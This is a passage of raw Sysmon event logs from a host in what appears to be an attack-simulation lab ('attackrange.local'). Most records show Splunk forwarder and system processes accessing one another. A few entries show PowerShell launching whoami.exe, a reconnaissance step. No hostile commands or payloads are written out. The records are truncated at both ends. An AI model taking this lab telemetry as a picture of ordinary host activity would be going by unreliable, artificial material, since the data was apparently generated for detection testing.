Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.763{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036498020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.294{B81B27B7-A198-6140-9756-04000000C801}50165404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A09996B6A939F613C0A8FF51BA53BC,SHA256=218BAA12149188050530B23EE8EC6E7EFD6E801C072C86CCC1E34FDCC743FF3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.094{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.079{B81B27B7-A198-6140-9756-04000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:25.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0EA67FA9C1FAA46D534E746ACB133B,SHA256=CB7A14DB33352F43E28B78A21563AC0B499D185CE9E041F5D2BF5CB1CB6E958E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:25.093{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28A17D44E2D7DFEB085D96DF0E95D9B6,SHA256=A4ECE226B12571329C0EFA87082A5055465C7A0BA3E268EA8067A37D9D66A8FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:26.227{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0815A68123E2A339078C6BE426D3D358,SHA256=2687EFE08F285BB89F97D461E99255695D23948597EA2886BB05CA8252E6B497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8F7580E032EF00F91E2A9EBB8268E8,SHA256=27FBA10680194D708F18B8A9ED5FC93107DDBBCBF526B9AD127E1BE8C8AC7C48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:56.714{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50605-false10.0.1.12-8000- 10341000x800000000000000036498039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v